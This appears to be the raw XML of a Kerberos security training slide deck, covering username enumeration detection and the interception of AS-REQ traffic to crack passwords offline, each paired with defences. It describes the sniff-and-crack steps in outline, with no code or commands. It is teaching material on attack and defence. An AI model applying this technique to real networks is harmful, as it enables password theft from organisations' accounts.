          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Part 0: Kerberos Primer</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{807519AA-607D-4823-AF54-6F967088DAF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9998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1C57-57C3-4B85-9072-B17292A633B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Username Enumeration: Defense</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F32A38F2-5D6C-4203-B042-C6E8E2B80DEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There is no “fix” for this…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multiple PRINCIPLE_UNKNOWN errors</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="265766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1252-42FD-4D29-A5E0-8D8C585273B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Part 2: Intercepting AS-REQ</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8204ED1A-B4C0-4B73-BA6A-53ED6819FCC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9810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D6B6B3C-A678-4484-A5C1-956772EBBE6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47064" y="188259"/>
            <a:ext cx="12062012" cy="662846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125F58-6609-F147-9BE6-724F328E4510}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Intercepting AS-REQ</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F65EA6EB-68F8-429B-A7E5-64D6ABADBCD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2420170" y="2619913"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2587669-04D0-4D9B-81BB-BC081DF06181}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8079454" y="4302120"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44A12586-5F11-48A7-9A21-AA54520F406D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8448890" y="745904"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EB8C559-BC4D-416C-AC0B-99642283F835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9957175" y="725282"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{366B0B42-8264-48E9-8A3E-294300102A6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1859530" y="2583231"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Picture 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D56AEB47-0CE5-4137-84B5-39C200A366C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9229180" y="627733"/>
            <a:ext cx="585242" cy="585242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Picture 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F71A077-574D-41A8-9262-753E2727C214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079240" y="2193086"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44" name="Picture 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB5BB2A9-FFC4-47E5-96CF-662738A41B4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1664433" y="3154127"/>
            <a:ext cx="585242" cy="585242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{636E3B25-6DF4-413F-8F3A-98E90CF3FCC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9957175" y="1212241"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46" name="Picture 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D49D8368-059D-49ED-B859-A99B060563FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8902946" y="4323724"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48" name="Picture 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87E105EB-92E0-497B-9334-FAE52F467FF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6548504" y="3037295"/>
            <a:ext cx="758011" cy="873120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CECDF310-845F-40AB-87EF-977ACB9DC671}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3226530" y="1227401"/>
            <a:ext cx="5271247" cy="1682278"/>
            <a:chOff x="3045555" y="894026"/>
            <a:chExt cx="5271247" cy="1682278"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="6" name="Straight Arrow Connector 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56738D1F-B76C-4536-B27B-7C943090F787}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3045555" y="894026"/>
              <a:ext cx="5271247" cy="1682278"/>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BDC64F-C78C-4EC8-92F4-0CF83CDD26A4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="4193674" y="1405912"/>
              <a:ext cx="2743200" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AS_REQ (request TGT)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4050062-9873-4FB6-9F2B-AAC6AD8B777E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3377888" y="1639660"/>
            <a:ext cx="5190242" cy="1599172"/>
            <a:chOff x="3196913" y="1306285"/>
            <a:chExt cx="5190242" cy="1599172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="30" name="Straight Arrow Connector 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8B00F27-22F7-4069-9880-E02010ABAB1A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3196913" y="1306285"/>
              <a:ext cx="5190242" cy="1599172"/>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D762194-1087-4543-A897-7D7E6180AB20}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="4344755" y="1717200"/>
              <a:ext cx="2743200" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AS_REP (receive TGT)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49" name="Picture 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CB987B3-807E-414B-8FFD-4187C36D1A82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9953647" y="1669441"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="50" name="Group 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3D61540-DC03-44A1-8741-932FC8C5B903}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2897659" y="585706"/>
            <a:ext cx="5271247" cy="1682278"/>
            <a:chOff x="3045555" y="894026"/>
            <a:chExt cx="5271247" cy="1682278"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="51" name="Straight Arrow Connector 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D8D8511-4A08-42CA-B5A4-222AA8E1FA10}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3045555" y="894026"/>
              <a:ext cx="5271247" cy="1682278"/>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21C91D3-A3E5-4035-91FE-4988FBDEE9E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="4193674" y="1405912"/>
              <a:ext cx="2743200" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AS_REQ (request TGT)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBBC2D70-F582-438D-9CD3-0F3DA7309D89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3031958" y="1018435"/>
            <a:ext cx="5221705" cy="1616481"/>
            <a:chOff x="3031958" y="1018435"/>
            <a:chExt cx="5221705" cy="1616481"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="54" name="Straight Arrow Connector 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DFC4EA1-6F7F-416E-93DC-65774BB1599A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3031958" y="1018435"/>
              <a:ext cx="5221705" cy="1616481"/>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8FF6679-51CA-4346-BC51-434245CCB870}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20530726">
              <a:off x="4202687" y="1360887"/>
              <a:ext cx="3224108" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>KRB_ERR (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Preauth</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> required)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3024162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Intercept AS-REQ </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Passively sniff the network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Identify AS-REQ traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Attempt to decrypt the ciphertext with potential passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>When the decrypted data looks like a timestamp you have identified the password.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Key is NTLM hash for systems up to and including: XP and 2003</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Vista and above does not use NTLM by default, more difficult to crack, partly due to lack of support (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/hashcat/hashcat/issues/1386</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="58986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1314-D662-405B-9C04-5F007B25EF2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intercept AS_REQ: Defense</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FF2047A-A892-4200-A0D5-83F77E24E761}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encourage strong passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable RC4-HMAC (Beware compatibility)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limit the opportunities for MITM attacks?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
